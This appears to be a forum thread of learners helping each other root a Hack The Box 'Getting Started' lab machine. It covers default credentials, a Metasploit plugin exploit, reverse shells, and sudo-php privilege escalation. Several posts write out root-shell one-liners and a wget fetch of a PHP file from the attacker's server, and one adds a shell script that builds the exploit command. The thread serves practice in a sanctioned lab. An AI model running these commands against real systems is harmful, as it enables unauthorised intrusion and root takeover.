Can I get a hint about the password? Nothing obvious is working.
If you search for “common default password” it gives some very common default passwords for vendor accounts in the first results.
That being said, I didn’t need to log in with the admin account to get the information I needed. I was using metasploit though.
Okay, full disclosure, this was my own user error. I have to assume that is the case, but in lieu of a lengthy explanation, let’s just say the credentials that work were always the 4th or 5th credentials I would try per instance. Sooo, yeah, it was basic AF. However, exploiting a php upload path to get in manually isn’t allowing me to access the final flag, so I have to ask: people are saying you are supposed to ssh in from your own VM in order to escalate privileges. I argued this sounded wrong to me because as of yet I haven’t done a module which required SSH, to the best of my knowledge, let alone doing so from my own spun-up machine. So I have to ask, should I just avoid that altogether and consider it poor memory of the module, or actually try to do that? Or what direction can someone offer for using the metasploit option? Thankye.
I suspect the way I did it was pretty primitive because I am still quite new to this, but I will try to outline my process without giving spoilers.
- enumerate the website and you find that there is a plugin running on the website
- Per previous lessons I searched online for the name of the plugin and current exploits for it
++Confirmed that the version running on the web server is vulnerable to the exploit
- Because I hadn’t yet figured out the password I chose to target an option for unauthenticated remote code execution
- I opened a terminal and opened msfconsole
- I ran the “search PLUGINNAME” option, where PLUGINNAME is the name of the actual plugin, and it displayed similar results for vulnerabilities
- In the metasploit command line you can type “use” and then the number corresponding to the exploit you want to use from the list of available exploits
++In my case I believe it was “use 1”
- Now you can type “show options” to see what your options are to try to establish the reverse shell
++This I just guessed at. Not many options needed to be configured.
- Once you have configured the correct options you can type “exploit” and it will create the reverse TCP shell.
++Note: I had issues after making this connection if I let a first instance of the session time out due to being unable to figure out the next part quickly enough. Afterward I had to reset both the target and attacking machine instances. I’m sure there was an easier way to clean out whatever broke the second attempt at re-establishing the reverse shell.
- When the session is established you can type “shell” to start the process of accessing the connection with a more functional shell. In one of the earlier sections of this module it outlines the command options to create a tty shell afterward, which is immensely more helpful.
- Run sudo -l to see if it gives you any info about which users can run root commands without a password
++This helped me, but other people advised also using LinEnum.sh or LinPeas.sh to get a better picture of what privileges we might be able to exploit. See previous comments in this thread about how to get that part working. simulation42’s post on Jun 26 gave me the missing piece I was having trouble with.
- At this point I knew I could run something as root without a password. It took me a little bit to realize I shouldn’t try to change to that directory because it was not a file I was able to execute from there (as we saw with the monitor.sh file from our lessons).
- I started looking up how to use the directory with online reverse shell cheat sheet commands, but the connections those helped me establish would not allow me RCE from the attacking machine.
++It was trial and error trying to figure out which command to use here, but it ended up being run from within my existing reverse shell. The command was a very basic one that essentially opened a root shell
- I could see that my user was root@getting-started, so from there I searched for the root.txt flag and fortunately found it by guessing which directory it might be in. I could not figure out how to get a global directory search to work for that file.
explore admin page …
Wow this one took me way too long. I got in and got the user flag pretty easy. Even figured out I needed to do something with the particular command you can run with sudo. But man my syntax was slightly off. I just didn’t understand where I needed to look on GTFObins.
In summary: You need very little to do this.
I got admin on the website with simple credentials
Found an exploit on the platform the website ran on.
Uploaded a rev shell (same one from earlier in the module) through the website in the way the exploit explained.
Opened up a netcat listener on my attack machine. Got rev shell no problem.
Get user flag
Figure out what commands I can run with sudo
Completely misunderstand what I’m seeing of GTFObins
Finally get it together and figure out the right command
Sorry for my poor English
You’re using the wget command correctly. But you have to use the command in the /var/www/html/theme/Innovation directory location, because you can’t write or execute any file in any other location.
Sorry for my poor English!
It’s pretty simple though: " NOPASSWD: /usr/bin/php ". We can use this to get root access by just using the command below:
sudo /usr/bin/php -r 'system("/bin/sh");'
If somebody is still reading this, I hope it’s useful. For the first task, in order to gain the user.txt flag, you can find somewhere on the website the version that is being used and search msfconsole for it with the syntax
search exploit <version number>. Then you just need to set RHOST, RPORT, and LHOST; you can leave the payload as is for now. You will gain control as a user and just navigate to user.txt.
For the next task, you need to gain root access. You can still use the same exploit in msfconsole, but this time you need to change the payload to number one with the following syntax
use payload 1. After that you will obtain the shell and you can start navigating through the machine. If you type the command
sudo -l, you will see that you can run ‘/usr/bin/php’ with NOPASSWD, which means you can run this command as the root user. Cool, so now you need a PHP script to gain priv. escalation, and the script is:
CMD="/bin/sh"
sudo php -r "system('$CMD');"
This script only allows me to type into the shell, I didn’t get root access with it. To tell you the truth I couldn’t run any script that would give me root access
here: php | GTFOBins
GTFOBins proves useful for privesc
I got a reverse shell, but when I want to get a sudo shell it freezes: sudo php -r "system('/bin/sh');" Does this command work for you?
I hope this solution will help somebody get the root flag.
What I simply did was create a php file on my machine:
<?php system ("su root"); ?>
then start a server with
sudo python3 -m http.server 8080
get the file on the target machine
wget http://<your ip>:8080/file.php
and get root with
sudo php -f file.php
Remember to do it in the “/var/www/html/theme/Innovation” directory location.
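The privilege-escalation step the posts above keep circling around (read sudo -l, spot the NOPASSWD php, spawn a root shell through it) as an added, stand-alone shell example. This is not code from the thread or from HTB; the sudo -l output is constructed for the example (the www-data user name and the Defaults line are assumptions; the NOPASSWD: /usr/bin/php entry is the one reported in the thread). It also shows why the one-liner with nested double quotes fails: the shell hands php the code system(/bin/sh); instead of system("/bin/sh");, which is a PHP parse error, so the shell appears to hang or just returns.

```shell
#!/bin/sh
# Added example (not from the thread). Parses `sudo -l` output and builds a
# correctly quoted php root-shell one-liner.

# Constructed sample of `sudo -l` output. User name and Defaults line are
# assumptions; the NOPASSWD /usr/bin/php entry is what the thread reports.
SAMPLE_SUDO_L='Matching Defaults entries for www-data on getting-started:
    env_reset, mail_badpass

User www-data may run the following commands on getting-started:
    (ALL) NOPASSWD: /usr/bin/php'

# Print every binary sudo allows without a password, one per line.
# Reads `sudo -l` output on stdin. Good enough for simple entries like the
# one above; a line mixing PASSWD: and NOPASSWD: tags would need more care.
nopasswd_bins() {
    sed -n 's/.*NOPASSWD:[[:space:]]*//p' \
        | tr ',' '\n' \
        | sed 's/^[[:space:]]*//; s/[[:space:]]*$//' \
        | grep -v '^$'
}

# Build the one-liner that spawns a root shell through a NOPASSWD php.
# Argument: path to the php binary as listed by sudo -l.
# The -r argument is wrapped in single quotes so the double quotes inside it
# reach php intact (this is the GTFOBins "sudo" recipe for php).
php_root_shell_cmd() {
    printf '%s' "sudo $1 -r 'system(\"/bin/sh\");'"
}

# Show what php would actually receive as its -r argument for a given
# command line, by letting the shell split the words the way it would
# before running them. Nothing is executed; only the 4th word is printed.
php_code_arg() {
    eval "set -- $1"
    printf '%s' "$4"
}

# Stand-alone demo: list the NOPASSWD binaries and emit a recipe for php.
printf '%s\n' "$SAMPLE_SUDO_L" | nopasswd_bins | while read -r bin; do
    case "$bin" in
        */php) php_root_shell_cmd "$bin"; echo ;;
        *)     echo "no recipe in this example for $bin" ;;
    esac
done

# Compare the correctly quoted command with the nested-double-quote version
# from the thread: php sees system("/bin/sh"); in the first case and the
# broken system(/bin/sh); in the second.
php_code_arg "$(php_root_shell_cmd /usr/bin/php)"; echo
php_code_arg 'sudo /usr/bin/php -r "system("/bin/sh");"'; echo
```

Run the emitted command from the reverse shell on the target, not from a new connection; sudo needs the tty-less session it inherits from the shell you already have, and the php process it starts is what drops you to root. If the shell still hangs, upgrade to a tty first (the module covers that) so /bin/sh has somewhere to read from.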
theme template is interesting.
I wrote a blog post about it; you can read it here: Daily Practice - HgTrojan